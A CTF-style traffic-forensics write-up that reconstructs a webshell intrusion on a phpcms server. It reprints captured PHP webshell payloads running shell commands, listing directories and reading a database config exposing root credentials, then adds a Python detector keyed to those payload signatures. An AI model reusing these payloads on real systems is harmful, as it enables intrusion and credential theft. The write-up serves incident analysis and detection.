@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the command uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the command ipconfig (it does not exist on Linux, so only the trailing pwd returns output)
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the command ifconfig
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/include/ directory
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/ directory
./  2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/ directory
phpsso_server/  2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/phpcms/ directory
./  2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/phpcms/libs/ directory
./  2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/phpcms/libs/data/ directory
./  2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/include/ directory
ERROR:// Path Not Found Or No Permission!
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/caches/ 下的所有文件 caches_admin/ 2017-09-03 03:37:50 4096 0777 caches_content/ 2017-09-03 03:37:50 4096 0777 poster_js/ 2017-09-03 03:37:50 4096 0777 bakup/ 2017-09-03 03:37:50 4096 0777 caches_commons/ 2017-09-03 03:37:50 4096 0777 caches_tpl_data/ 2017-09-03 03:37:50 4096 0777 caches_linkage/ 2017-09-03 03:37:50 4096 0777 caches_model/ 2017-09-03 03:37:50 4096 0777 ./ 2017-09-03 03:45:14 4096 0777 vote_js/ 2017-09-03 03:37:50 4096 0777 caches_search/ 2017-09-03 03:38:33 4096 0755 caches_scan/ 2017-09-03 03:37:50 4096 0777 caches_member/ 2017-09-03 03:37:50 4096 0777 sessions/ 2017-09-03 03:37:50 4096 0777 ../ 2017-09-03 03:38:34 4096 0777 configs/ 2017-09-03 03:37:50 4096 0777 caches_template/ 2017-09-03 03:45:14 4096 0777 install.lock 2017-09-03 03:38:34 0 0644 error_log.php 2017-09-05 02:54:12 769 0644 index.html 2017-09-03 03:31:45 1 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/caches/configs/ 下的所有文件 ./ 2017-09-03 03:37:50 4096 0777 ../ 2017-09-03 03:45:14 4096 0777 
ku6server.php 2017-09-03 03:31:45 208 0777 sub_config.php 2017-09-03 03:31:45 1376 0777 route.php 2017-09-03 03:31:45 803 0777 credit.php 2017-09-03 03:31:45 122 0777 cache.php 2017-09-03 03:31:45 330 0777 database.php 2017-09-03 03:38:32 324 0777 model_config.php 2017-09-03 03:31:45 52 0777 version.php 2017-09-03 03:31:45 118 0777 modules.php 2017-09-03 03:38:33 212 0777 ku6status_config.php 2017-09-03 03:31:45 781 0777 snda.php 2017-09-03 03:31:45 51 0777 system.php 2017-09-05 00:11:58 2430 0777 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die(); // 读取文件 /var/www/html/caches/configs/database.php 内容 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die(); // 读取文件 /var/www/html/caches/configs/database.php 内容 array ( 'hostname' => 'localhost', 'port' => 3306, 'database' => 'phpcmsv9', 'username' => 'root', 'password' => '123456', 'tablepre' => 'v9_', 'charset' => 'gbk', 'type' => 'mysqli', 'debug' => true, 'pconnect' => 0, 'autoconnect' => 0 ), ); ?> @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/include/ 下的所有文件 
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die(); // 读取目录 /var/www/html/ 下的所有文件

The attacker's approach and the full attack flow are now clear as well:
first, the attacker (172.16.10.110) obtained a webshell on a reachable Windows host, 192.168.20.117 (DedeCMS);
then used lcx to forward port 80 of the internal host 192.168.20.88 (phpcms) to port 8888 on 172.16.10.110;
and finally exploited a vulnerability through that tunnel to gain access to the internal host.
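The timeline above (which directory was listed, which file was read, which command was run) was reconstructed by hand with grep over the `tcpdump -A` text. As an added example, not code from the writeup or its author, the script below automates both observations: it splits a `tcpdump -A` dump into packets, picks out webshell requests by the signatures the writeup identified (the spoofed Baiduspider User-Agent, the `@ini_set("display_errors","0")` prologue, the `X@Y` output delimiters) and reads the `$s` / `$D` / `$F` operand of each payload into one timeline row; it also flags the lcx pattern seen in the capture, namely HTTP requests arriving *from* one fixed remote port (8888) toward several ephemeral ports on the victim, which only happens when the victim connected out and requests are flowing back down a tunnel. The sample dump and the `x=` parameter name are constructed for the example.

```python
# Added example (not from the writeup): rebuild the attacker's action timeline
# from a `tcpdump -A` text dump and flag the reverse port-forward pattern.
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

UA_SIGNATURE = "Baiduspider/2.0"                  # spoofed crawler UA noted in the writeup
PAYLOAD_MARKERS = ('@ini_set("display_errors","0")', 'echo("X@Y")')  # shell prologue / delimiters
WEB_PORTS = {80, 443, 8080}                      # where HTTP requests normally go

# tcpdump header: "17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], ..."
HEADER_RE = re.compile(r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<sip>[\d.]+)\.(?P<sport>\d+)"
                       r" > (?P<dip>[\d.]+)\.(?P<dport>\d+): ")
REQUEST_RE = re.compile(r"^(GET|POST) \S+ HTTP/1\.[01]$", re.M)
# Operands the captured payloads carry: $s = shell command, $D = directory, $F = file path.
ACTION_RES = (("exec", re.compile(r"\$s='([^']*)'")),
              ("list", re.compile(r"\$D='([^']*)'")),
              ("read", re.compile(r"\$F=['\"]([^'\"]*)['\"]")))


@dataclass
class Packet:
    ts: str
    sip: str
    sport: int
    dip: str
    dport: int
    text: str = ""


def parse_dump(dump: str) -> list[Packet]:
    """Split `tcpdump -A` text into packets; the ASCII lines follow each header line."""
    packets: list[Packet] = []
    for line in dump.splitlines():
        m = HEADER_RE.match(line)
        if m:
            packets.append(Packet(m["ts"], m["sip"], int(m["sport"]), m["dip"], int(m["dport"])))
        elif packets:
            packets[-1].text += line + "\n"
    return packets


def is_webshell_request(p: Packet) -> bool:
    return (REQUEST_RE.search(p.text) is not None and UA_SIGNATURE in p.text
            and all(marker in p.text for marker in PAYLOAD_MARKERS))


def classify_action(text: str) -> tuple[str, str]:
    """Return (kind, operand) from the first operand pattern that matches."""
    for kind, rx in ACTION_RES:
        m = rx.search(text)
        if m:
            return kind, m.group(1)
    return "unknown", ""


def timeline(packets: list[Packet]) -> list[tuple[str, str, str, str, str]]:
    """One (time, src, dst, kind, operand) row per webshell request, in capture order."""
    return [(p.ts, f"{p.sip}:{p.sport}", f"{p.dip}:{p.dport}", *classify_action(p.text))
            for p in packets if is_webshell_request(p)]


def reverse_forward_endpoints(packets: list[Packet]) -> dict[tuple[str, int], list[int]]:
    """A real client uses a fresh ephemeral port per connection and never sends requests
    from one fixed port to several ephemeral ports. When that happens, the destination
    host connected *out* to the source and requests are flowing back down a tunnel."""
    seen: dict[tuple[str, int], set[int]] = defaultdict(set)
    for p in packets:
        if REQUEST_RE.search(p.text) and p.dport not in WEB_PORTS:
            seen[(p.sip, p.sport)].add(p.dport)
    return {ep: sorted(ports) for ep, ports in seen.items() if len(ports) >= 2}


# Constructed sample dump (hosts and webshell path from the writeup; "x=" is assumed).
SAMPLE_DUMP = """\
17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1:598, ack 1, win 64240, length 597
POST /uploadfile/2017/0905/20170905055411283.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

x=@ini_set("display_errors","0");echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);echo("X@Y");die();
17:54:05.201000 IP 172.16.10.110.8888 > 192.168.20.117.1412: Flags [P.], seq 1:602, ack 1, win 64240, length 601
POST /uploadfile/2017/0905/20170905055411283.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

x=@ini_set("display_errors","0");echo("X@Y");$F='/var/www/html/caches/configs/database.php';echo("X@Y");die();
17:54:07.400000 IP 172.16.10.110.8888 > 192.168.20.117.1415: Flags [P.], seq 1:640, ack 1, win 64240, length 639
POST /uploadfile/2017/0905/20170905055411283.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

x=@ini_set("display_errors","0");echo("X@Y");$p='/bin/sh';$s='cd /var/www/html/;ifconfig';echo("X@Y");die();
17:55:00.000000 IP 172.16.10.50.51000 > 192.168.20.117.80: Flags [P.], seq 1:120, ack 1, win 64240, length 119
GET /index.php HTTP/1.1
User-Agent: Mozilla/5.0
"""

if __name__ == "__main__":
    pkts = parse_dump(SAMPLE_DUMP)
    for row in timeline(pkts):
        print(*row, sep="  ")
    print("reverse-forward endpoints:", reverse_forward_endpoints(pkts))
```

Run against the real `http.txt`, `timeline()` gives the same three kinds of rows the writeup annotated by hand, and `reverse_forward_endpoints()` returns the attacker's 8888 listener with every victim-side ephemeral port that was driven through it; the last, ordinary GET to port 80 is ignored by both checks.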

At this point the HTTP-level part of the challenge is essentially analysed; once the actual questions are available, the answers can be filled in directly.
This challenge also provides FTP logs,
so it presumably involves the FTP protocol as well.

#!/bin/bash
#ftp.sh
# Extract every packet involving the two hosts from each capture into ftp/<file>.
# -A is dropped here: it only affects printed output, and with -w tcpdump writes raw
# packets regardless, so the results are ordinary pcaps that open in Wireshark.

target_folder='ftp'

mkdir -p "${target_folder}"

for file in *.pcap;
do
   echo "Dumping ftp package in ${file}..."
   tcpdump -s 0 'host 192.168.20.117 or host 192.168.20.248' -r "$file" -w "${target_folder}/${file}"
   echo "${file} Done!"
done

[image 11]
[image 12]
[image 13]

There are FTP packets, but the IPs from the log do not seem to appear in them.
Perhaps my copy of the packet captures is incomplete?
